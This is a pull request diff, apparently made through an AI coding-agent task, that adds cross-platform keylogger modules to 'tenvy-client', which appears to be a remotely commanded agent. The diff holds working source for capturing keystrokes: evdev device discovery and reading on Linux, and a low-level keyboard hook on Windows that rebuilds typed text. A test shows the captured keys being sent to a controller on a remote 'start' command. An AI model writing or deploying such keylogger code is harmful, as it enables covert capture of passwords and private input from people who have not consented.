### PR TITLE
Add native keylogger providers and linux integration test

### DIFF
--- a/tenvy-client/internal/modules/control/keylogger/errors.go
+++ b/tenvy-client/internal/modules/control/keylogger/errors.go
@@ -1,0 +1,5 @@
+package keylogger
+
+import "errors"
+
+var ErrProviderUnavailable = errors.New("keylogger provider not supported on this platform")

--- a/tenvy-client/internal/modules/control/keylogger/manager_linux_test.go
+++ b/tenvy-client/internal/modules/control/keylogger/manager_linux_test.go
@@ -1,0 +1,95 @@
+//go:build linux
+
+package keylogger
+
+import (
+	"context"
+	"encoding/binary"
+	"encoding/json"
+	"io"
+	"testing"
+	"time"
+)
+
+func TestManagerLinuxProviderIntegration(t *testing.T) {
+	originalFinder := linuxDeviceFinder
+	originalOpener := linuxDeviceOpener
+	defer func() {
+		linuxDeviceFinder = originalFinder
+		linuxDeviceOpener = originalOpener
+	}()
+
+	reader, writer := io.Pipe()
+	devicePath := "/dev/input/event-test"
+
+	linuxDeviceFinder = func() ([]string, error) {
+		return []string{devicePath}, nil
+	}
+	linuxDeviceOpener = func(path string) (io.ReadCloser, error) {
+		if path != devicePath {
+			t.Fatalf("unexpected device path: %s", path)
+		}
+		return reader, nil
+	}
+
+	provider := defaultProviderFactory()()
+	if _, ok := provider.(*linuxProvider); !ok {
+		t.Fatalf("expected linux provider, got %T", provider)
+	}
+
+	client := &fakeHTTPClient{}
+	manager := NewManager(Config{AgentID: "agent-linux", BaseURL: "https://controller", Client: client})
+
+	payload := CommandPayload{
+		Action: "start",
+		Config: &StartConfig{Mode: ModeStandard, CadenceMs: 25, BufferSize: 2},
+	}
+	data, _ := json.Marshal(payload)
+	result := manager.HandleCommand(context.Background(), Command{ID: "cmd-linux", Name: "keylogger.start", Payload: data})
+	if !result.Success {
+		t.Fatalf("start failed: %s", result.Error)
+	}
+
+	done := make(chan struct{})
+	go func() {
+		defer close(done)
+		writeLinuxEvent(t, writer, 30, 1) // 'a' press
+		writeLinuxEvent(t, writer, 30, 0) // 'a' release
+	}()
+
+	req := client.popRequest(t)
+	var envelope EventEnvelope
+	if err := json.Unmarshal(req.Body, &envelope); err != nil {
+		t.Fatalf("failed to decode envelope: %v", err)
+	}
+	if len(envelope.Events) == 0 {
+		t.Fatalf("expected events from linux provider")
+	}
+	if envelope.Events[0].Key != "a" {
+		t.Fatalf("expected key 'a', got %s", envelope.Events[0].Key)
+	}
+
+	stopPayload := CommandPayload{Action: "stop", SessionID: envelope.SessionID}
+	stopData, _ := json.Marshal(stopPayload)
+	stopResult := manager.HandleCommand(context.Background(), Command{ID: "cmd-stop", Name: "keylogger.stop", Payload: stopData})
+	if !stopResult.Success {
+		t.Fatalf("stop failed: %s", stopResult.Error)
+	}
+
+	writer.Close()
+	<-done
+}
+
+func writeLinuxEvent(t *testing.T, w io.Writer, code uint16, value int32) {
+	t.Helper()
+	ev := linuxInputEvent{
+		Sec:   time.Now().Unix(),
+		Usec:  int64(time.Now().UnixNano()/1000) % 1000000,
+		Type:  linuxEventKey,
+		Code:  code,
+		Value: value,
+	}
+	if err := binary.Write(w, binary.LittleEndian, ev); err != nil {
+		t.Fatalf("failed to write linux event: %v", err)
+	}
+}

--- a/tenvy-client/internal/modules/control/keylogger/provider_linux.go
+++ b/tenvy-client/internal/modules/control/keylogger/provider_linux.go
@@ -1,0 +1,356 @@
+//go:build linux
+
+package keylogger
+
+import (
+	"bufio"
+	"context"
+	"encoding/binary"
+	"fmt"
+	"io"
+	"os"
+	"path/filepath"
+	"strings"
+	"sync"
+	"time"
+)
+
+const (
+	linuxEventKey = 0x01
+)
+
+type linuxInputEvent struct {
+	Sec   int64
+	Usec  int64
+	Type  uint16
+	Code  uint16
+	Value int32
+}
+
+type linuxProvider struct {
+	findDevices func() ([]string, error)
+	openDevice  func(string) (io.ReadCloser, error)
+}
+
+func newLinuxProvider() *linuxProvider {
+	finder := linuxDeviceFinder
+	if finder == nil {
+		finder = detectKeyboardDevices
+	}
+	opener := linuxDeviceOpener
+	if opener == nil {
+		opener = func(path string) (io.ReadCloser, error) {
+			return os.Open(path)
+		}
+	}
+	return &linuxProvider{
+		findDevices: finder,
+		openDevice:  opener,
+	}
+}
+
+func defaultProviderFactory() func() Provider {
+	return func() Provider {
+		return newLinuxProvider()
+	}
+}
+
+func (p *linuxProvider) Start(ctx context.Context, cfg StartConfig) (EventStream, error) {
+	if ctx == nil {
+		ctx = context.Background()
+	}
+
+	devices, err := p.findDevices()
+	if err != nil || len(devices) == 0 {
+		return nil, ErrProviderUnavailable
+	}
+
+	normalized := cfg.normalize()
+	stream := newChannelEventStream(normalized.BufferSize)
+	modifiers := &modifierState{}
+
+	var wg sync.WaitGroup
+	started := 0
+
+	for _, device := range devices {
+		rc, openErr := p.openDevice(device)
+		if openErr != nil {
+			continue
+		}
+		started++
+		wg.Add(1)
+		go func(r io.ReadCloser) {
+			defer wg.Done()
+			defer r.Close()
+			p.readEvents(ctx, r, stream, modifiers)
+		}(rc)
+	}
+
+	if started == 0 {
+		stream.Close()
+		return nil, ErrProviderUnavailable
+	}
+
+	go func() {
+		<-ctx.Done()
+		stream.Close()
+	}()
+
+	go func() {
+		wg.Wait()
+		stream.Close()
+	}()
+
+	return stream, nil
+}
+
+func (p *linuxProvider) readEvents(ctx context.Context, r io.Reader, stream *channelEventStream, modifiers *modifierState) {
+	decoder := binary.LittleEndian
+	for {
+		select {
+		case <-ctx.Done():
+			return
+		default:
+		}
+
+		var ev linuxInputEvent
+		if err := binary.Read(r, decoder, &ev); err != nil {
+			return
+		}
+		if ev.Type != linuxEventKey {
+			continue
+		}
+
+		pressed := ev.Value != 0
+
+		if isModifierKey(ev.Code) {
+			modifiers.set(ev.Code, pressed)
+		}
+		alt, ctrl, shift, meta := modifiers.snapshot()
+
+		key := keyForScanCode(ev.Code)
+		timestamp := time.Unix(ev.Sec, ev.Usec*1000).UTC()
+
+		event := CaptureEvent{
+			Timestamp: timestamp,
+			Key:       key,
+			RawCode:   fmt.Sprintf("%d", ev.Code),
+			ScanCode:  ev.Code,
+			Pressed:   pressed,
+			Alt:       alt,
+			Ctrl:      ctrl,
+			Shift:     shift,
+			Meta:      meta,
+		}
+
+		if pressed && len(key) == 1 {
+			if shift {
+				event.Text = strings.ToUpper(key)
+			} else {
+				event.Text = key
+			}
+		}
+
+		if !stream.emit(ctx, event) {
+			return
+		}
+	}
+}
+
+var linuxDeviceFinder = detectKeyboardDevices
+
+func detectKeyboardDevices() ([]string, error) {
+	file, err := os.Open("/proc/bus/input/devices")
+	if err != nil {
+		return nil, err
+	}
+	defer file.Close()
+
+	scanner := bufio.NewScanner(file)
+	var devices []string
+	for scanner.Scan() {
+		line := scanner.Text()
+		if !strings.HasPrefix(line, "H: Handlers=") {
+			continue
+		}
+		handlers := strings.Fields(strings.TrimPrefix(line, "H: Handlers="))
+		hasKeyboard := false
+		var eventNames []string
+		for _, handler := range handlers {
+			if handler == "kbd" || strings.Contains(strings.ToLower(handler), "keyboard") {
+				hasKeyboard = true
+			}
+			if strings.HasPrefix(handler, "event") {
+				eventNames = append(eventNames, handler)
+			}
+		}
+		if hasKeyboard {
+			for _, name := range eventNames {
+				devices = append(devices, filepath.Join("/dev/input", name))
+			}
+		}
+	}
+	if len(devices) == 0 {
+		return nil, fmt.Errorf("no keyboard devices found")
+	}
+	return devices, nil
+}
+
+var linuxDeviceOpener = func(path string) (io.ReadCloser, error) {
+	return os.Open(path)
+}
+
+type modifierState struct {
+	mu    sync.RWMutex
+	alt   bool
+	ctrl  bool
+	shift bool
+	meta  bool
+}
+
+func (m *modifierState) set(code uint16, pressed bool) {
+	m.mu.Lock()
+	switch code {
+	case 29, 97:
+		m.ctrl = pressed
+	case 56, 100:
+		m.alt = pressed
+	case 42, 54:
+		m.shift = pressed
+	case 125, 126, 133, 134:
+		m.meta = pressed
+	}
+	m.mu.Unlock()
+}
+
+func (m *modifierState) snapshot() (alt, ctrl, shift, meta bool) {
+	m.mu.RLock()
+	alt, ctrl, shift, meta = m.alt, m.ctrl, m.shift, m.meta
+	m.mu.RUnlock()
+	return
+}
+
+func isModifierKey(code uint16) bool {
+	switch code {
+	case 29, 97, 56, 100, 42, 54, 125, 126, 133, 134:
+		return true
+	default:
+		return false
+	}
+}
+
+func keyForScanCode(code uint16) string {
+	if name, ok := linuxKeyNames[code]; ok {
+		return name
+	}
+	return fmt.Sprintf("key_%d", code)
+}
+
+var linuxKeyNames = map[uint16]string{
+	1:   "esc",
+	2:   "1",
+	3:   "2",
+	4:   "3",
+	5:   "4",
+	6:   "5",
+	7:   "6",
+	8:   "7",
+	9:   "8",
+	10:  "9",
+	11:  "0",
+	12:  "-",
+	13:  "=",
+	14:  "backspace",
+	15:  "tab",
+	16:  "q",
+	17:  "w",
+	18:  "e",
+	19:  "r",
+	20:  "t",
+	21:  "y",
+	22:  "u",
+	23:  "i",
+	24:  "o",
+	25:  "p",
+	26:  "[",
+	27:  "]",
+	28:  "enter",
+	29:  "ctrl",
+	30:  "a",
+	31:  "s",
+	32:  "d",
+	33:  "f",
+	34:  "g",
+	35:  "h",
+	36:  "j",
+	37:  "k",
+	38:  "l",
+	39:  ";",
+	40:  "'",
+	41:  "`",
+	42:  "shift",
+	43:  "\\",
+	44:  "z",
+	45:  "x",
+	46:  "c",
+	47:  "v",
+	48:  "b",
+	49:  "n",
+	50:  "m",
+	51:  ",",
+	52:  ".",
+	53:  "/",
+	54:  "shift",
+	55:  "kp_*",
+	56:  "alt",
+	57:  "space",
+	58:  "capslock",
+	59:  "f1",
+	60:  "f2",
+	61:  "f3",
+	62:  "f4",
+	63:  "f5",
+	64:  "f6",
+	65:  "f7",
+	66:  "f8",
+	67:  "f9",
+	68:  "f10",
+	69:  "numlock",
+	70:  "scrolllock",
+	71:  "kp_7",
+	72:  "kp_8",
+	73:  "kp_9",
+	74:  "kp_-",
+	75:  "kp_4",
+	76:  "kp_5",
+	77:  "kp_6",
+	78:  "kp_+",
+	79:  "kp_1",
+	80:  "kp_2",
+	81:  "kp_3",
+	82:  "kp_0",
+	83:  "kp_.",
+	96:  "kp_enter",
+	97:  "ctrl",
+	98:  "kp_/",
+	99:  "printscreen",
+	100: "alt",
+	102: "home",
+	103: "up",
+	104: "pageup",
+	105: "left",
+	106: "right",
+	107: "end",
+	108: "down",
+	109: "pagedown",
+	110: "insert",
+	111: "delete",
+	113: "mute",
+	114: "volumedown",
+	115: "volumeup",
+	116: "power",
+	125: "meta",
+	126: "meta",
+	133: "meta",
+	134: "meta",
+}

--- a/tenvy-client/internal/modules/control/keylogger/provider_stub.go
+++ b/tenvy-client/internal/modules/control/keylogger/provider_stub.go
@@ -1,11 +1,8 @@
+//go:build !linux && !windows
+
 package keylogger
 
-import (
-	"context"
-	"errors"
-)
-
-var ErrProviderUnavailable = errors.New("keylogger provider not supported on this platform")
+import "context"
 
 type stubProvider struct{}
 

--- a/tenvy-client/internal/modules/control/keylogger/provider_windows.go
+++ b/tenvy-client/internal/modules/control/keylogger/provider_windows.go
@@ -1,0 +1,360 @@
+//go:build windows
+
+package keylogger
+
+import (
+	"context"
+	"fmt"
+	"runtime"
+	"strings"
+	"sync"
+	"syscall"
+	"time"
+	"unsafe"
+
+	"github.com/lxn/win"
+)
+
+type windowsProvider struct{}
+
+type windowsHookSession struct {
+	ctx       context.Context
+	cancel    context.CancelFunc
+	stream    *channelEventStream
+	modifiers *windowsModifierState
+	hook      win.HHOOK
+}
+
+var (
+	windowsSessionMu sync.Mutex
+	windowsSession   *windowsHookSession
+)
+
+func defaultProviderFactory() func() Provider {
+	return func() Provider {
+		return &windowsProvider{}
+	}
+}
+
+func (p *windowsProvider) Start(ctx context.Context, cfg StartConfig) (EventStream, error) {
+	if ctx == nil {
+		ctx = context.Background()
+	}
+
+	normalized := cfg.normalize()
+	stream := newChannelEventStream(normalized.BufferSize)
+
+	sessionCtx, cancel := context.WithCancel(ctx)
+	session := &windowsHookSession{
+		ctx:       sessionCtx,
+		cancel:    cancel,
+		stream:    stream,
+		modifiers: &windowsModifierState{},
+	}
+
+	ready := make(chan error, 1)
+
+	windowsSessionMu.Lock()
+	if windowsSession != nil {
+		windowsSessionMu.Unlock()
+		cancel()
+		stream.Close()
+		return nil, fmt.Errorf("keylogger provider already active")
+	}
+	windowsSession = session
+	windowsSessionMu.Unlock()
+
+	go session.run(ready)
+
+	if err := <-ready; err != nil {
+		cancel()
+		session.cleanup()
+		return nil, err
+	}
+
+	go func() {
+		<-sessionCtx.Done()
+		session.cleanup()
+	}()
+
+	return stream, nil
+}
+
+func (s *windowsHookSession) cleanup() {
+	windowsSessionMu.Lock()
+	if windowsSession == s {
+		windowsSession = nil
+	}
+	windowsSessionMu.Unlock()
+	s.stream.Close()
+}
+
+type kbdLLHook struct {
+	VkCode      uint32
+	ScanCode    uint32
+	Flags       uint32
+	Time        uint32
+	DwExtraInfo uintptr
+}
+
+var keyboardProc = syscall.NewCallback(func(nCode int32, wParam uintptr, lParam uintptr) uintptr {
+	if nCode == win.HC_ACTION {
+		windowsSessionMu.Lock()
+		session := windowsSession
+		windowsSessionMu.Unlock()
+		if session != nil {
+			event := (*kbdLLHook)(unsafe.Pointer(lParam))
+			pressed := wParam == win.WM_KEYDOWN || wParam == win.WM_SYSKEYDOWN
+			released := wParam == win.WM_KEYUP || wParam == win.WM_SYSKEYUP
+			if pressed || released {
+				session.emit(pressed, event)
+			}
+		}
+	}
+	return win.CallNextHookEx(0, int32(nCode), wParam, lParam)
+})
+
+func (s *windowsHookSession) run(ready chan<- error) {
+	runtime.LockOSThread()
+	defer runtime.UnlockOSThread()
+	defer s.cancel()
+
+	threadID := win.GetCurrentThreadId()
+	hook := win.SetWindowsHookEx(win.WH_KEYBOARD_LL, keyboardProc, win.GetModuleHandle(nil), 0)
+	if hook == 0 {
+		ready <- ErrProviderUnavailable
+		return
+	}
+	s.hook = hook
+	ready <- nil
+
+	quit := make(chan struct{})
+	go func() {
+		select {
+		case <-s.ctx.Done():
+			win.PostThreadMessage(threadID, win.WM_QUIT, 0, 0)
+		case <-quit:
+		}
+	}()
+
+	var msg win.MSG
+	for {
+		ret := win.GetMessage(&msg, 0, 0, 0)
+		if ret == 0 || ret == -1 {
+			break
+		}
+		win.TranslateMessage(&msg)
+		win.DispatchMessage(&msg)
+	}
+
+	close(quit)
+
+	if s.hook != 0 {
+		win.UnhookWindowsHookEx(s.hook)
+	}
+}
+
+func (s *windowsHookSession) emit(pressed bool, data *kbdLLHook) {
+	if data == nil {
+		return
+	}
+
+	vk := data.VkCode
+	if isWindowsModifier(vk) {
+		s.modifiers.set(vk, pressed)
+	}
+	alt, ctrl, shift, meta := s.modifiers.snapshot()
+
+	key := windowsKeyName(vk)
+	event := CaptureEvent{
+		Timestamp: time.Now().UTC(),
+		Key:       key,
+		RawCode:   fmt.Sprintf("%d", vk),
+		ScanCode:  uint16(data.ScanCode),
+		Pressed:   pressed,
+		Alt:       alt,
+		Ctrl:      ctrl,
+		Shift:     shift,
+		Meta:      meta,
+	}
+
+	if pressed {
+		if text := windowsKeyText(vk, shift); text != "" {
+			event.Text = text
+		}
+	}
+
+	s.stream.emit(s.ctx, event)
+}
+
+type windowsModifierState struct {
+	mu    sync.RWMutex
+	alt   bool
+	ctrl  bool
+	shift bool
+	meta  bool
+}
+
+func (m *windowsModifierState) set(vk uint32, pressed bool) {
+	m.mu.Lock()
+	switch vk {
+	case win.VK_MENU, win.VK_LMENU, win.VK_RMENU:
+		m.alt = pressed
+	case win.VK_CONTROL, win.VK_LCONTROL, win.VK_RCONTROL:
+		m.ctrl = pressed
+	case win.VK_SHIFT, win.VK_LSHIFT, win.VK_RSHIFT:
+		m.shift = pressed
+	case win.VK_LWIN, win.VK_RWIN:
+		m.meta = pressed
+	}
+	m.mu.Unlock()
+}
+
+func (m *windowsModifierState) snapshot() (alt, ctrl, shift, meta bool) {
+	m.mu.RLock()
+	alt, ctrl, shift, meta = m.alt, m.ctrl, m.shift, m.meta
+	m.mu.RUnlock()
+	return
+}
+
+func isWindowsModifier(vk uint32) bool {
+	switch vk {
+	case win.VK_MENU, win.VK_LMENU, win.VK_RMENU,
+		win.VK_CONTROL, win.VK_LCONTROL, win.VK_RCONTROL,
+		win.VK_SHIFT, win.VK_LSHIFT, win.VK_RSHIFT,
+		win.VK_LWIN, win.VK_RWIN:
+		return true
+	default:
+		return false
+	}
+}
+
+func windowsKeyText(vk uint32, shift bool) string {
+	if name, ok := windowsPrintableKeys[vk]; ok {
+		if shift {
+			if shifted, ok := windowsShiftedPrintable[vk]; ok {
+				return shifted
+			}
+			return strings.ToUpper(name)
+		}
+		return name
+	}
+	return ""
+}
+
+func windowsKeyName(vk uint32) string {
+	if name, ok := windowsKeyNames[vk]; ok {
+		return name
+	}
+	return fmt.Sprintf("vk_%d", vk)
+}
+
+var windowsPrintableKeys = map[uint32]string{
+	'A':               "a",
+	'B':               "b",
+	'C':               "c",
+	'D':               "d",
+	'E':               "e",
+	'F':               "f",
+	'G':               "g",
+	'H':               "h",
+	'I':               "i",
+	'J':               "j",
+	'K':               "k",
+	'L':               "l",
+	'M':               "m",
+	'N':               "n",
+	'O':               "o",
+	'P':               "p",
+	'Q':               "q",
+	'R':               "r",
+	'S':               "s",
+	'T':               "t",
+	'U':               "u",
+	'V':               "v",
+	'W':               "w",
+	'X':               "x",
+	'Y':               "y",
+	'Z':               "z",
+	'0':               "0",
+	'1':               "1",
+	'2':               "2",
+	'3':               "3",
+	'4':               "4",
+	'5':               "5",
+	'6':               "6",
+	'7':               "7",
+	'8':               "8",
+	'9':               "9",
+	win.VK_SPACE:      " ",
+	win.VK_OEM_1:      ";",
+	win.VK_OEM_PLUS:   "=",
+	win.VK_OEM_COMMA:  ",",
+	win.VK_OEM_MINUS:  "-",
+	win.VK_OEM_PERIOD: ".",
+	win.VK_OEM_2:      "/",
+	win.VK_OEM_3:      "`",
+	win.VK_OEM_4:      "[",
+	win.VK_OEM_5:      "\\",
+	win.VK_OEM_6:      "]",
+	win.VK_OEM_7:      "'",
+}
+
+var windowsShiftedPrintable = map[uint32]string{
+	'1':               "!",
+	'2':               "@",
+	'3':               "#",
+	'4':               "$",
+	'5':               "%",
+	'6':               "^",
+	'7':               "&",
+	'8':               "*",
+	'9':               "(",
+	'0':               ")",
+	win.VK_OEM_MINUS:  "_",
+	win.VK_OEM_PLUS:   "+",
+	win.VK_OEM_1:      ":",
+	win.VK_OEM_2:      "?",
+	win.VK_OEM_3:      "~",
+	win.VK_OEM_4:      "{",
+	win.VK_OEM_5:      "|",
+	win.VK_OEM_6:      "}",
+	win.VK_OEM_7:      "\"",
+	win.VK_OEM_COMMA:  "<",
+	win.VK_OEM_PERIOD: ">",
+}
+
+var windowsKeyNames = map[uint32]string{
+	win.VK_ESCAPE:  "escape",
+	win.VK_TAB:     "tab",
+	win.VK_SHIFT:   "shift",
+	win.VK_CONTROL: "ctrl",
+	win.VK_MENU:    "alt",
+	win.VK_LWIN:    "meta",
+	win.VK_RWIN:    "meta",
+	win.VK_SPACE:   "space",
+	win.VK_BACK:    "backspace",
+	win.VK_RETURN:  "enter",
+	win.VK_CAPITAL: "capslock",
+	win.VK_F1:      "f1",
+	win.VK_F2:      "f2",
+	win.VK_F3:      "f3",
+	win.VK_F4:      "f4",
+	win.VK_F5:      "f5",
+	win.VK_F6:      "f6",
+	win.VK_F7:      "f7",
+	win.VK_F8:      "f8",
+	win.VK_F9:      "f9",
+	win.VK_F10:     "f10",
+	win.VK_F11:     "f11",
+	win.VK_F12:     "f12",
+	win.VK_DELETE:  "delete",
+	win.VK_HOME:    "home",
+	win.VK_END:     "end",
+	win.VK_PRIOR:   "pageup",
+	win.VK_NEXT:    "pagedown",
+	win.VK_LEFT:    "left",
+	win.VK_RIGHT:   "right",
+	win.VK_UP:      "up",
+	win.VK_DOWN:    "down",
+}

--- a/tenvy-client/internal/modules/control/keylogger/stream.go
+++ b/tenvy-client/internal/modules/control/keylogger/stream.go
@@ -1,0 +1,38 @@
+package keylogger
+
+import (
+	"context"
+	"sync"
+)
+
+type channelEventStream struct {
+	events    chan CaptureEvent
+	closeOnce sync.Once
+}
+
+func newChannelEventStream(size int) *channelEventStream {
+	if size <= 0 {
+		size = defaultBufferSize
+	}
+	return &channelEventStream{events: make(chan CaptureEvent, size)}
+}
+
+func (s *channelEventStream) Events() <-chan CaptureEvent {
+	return s.events
+}
+
+func (s *channelEventStream) Close() error {
+	s.closeOnce.Do(func() {
+		close(s.events)
+	})
+	return nil
+}
+
+func (s *channelEventStream) emit(ctx context.Context, event CaptureEvent) bool {
+	select {
+	case <-ctx.Done():
+		return false
+	case s.events <- event:
+		return true
+	}
+}


### PR DESCRIPTION
## Summary
- implement Linux keylogger provider that streams events from evdev devices
- add Windows keylogger provider using a low-level keyboard hook and shared event stream helper
- cover the Linux provider in an integration-oriented manager test and keep the stub for unsupported platforms

## Testing
- `go test ./...`


------
https://chatgpt.com/codex/tasks/task_e_68fa62c89824832b916b585ddc38b8ed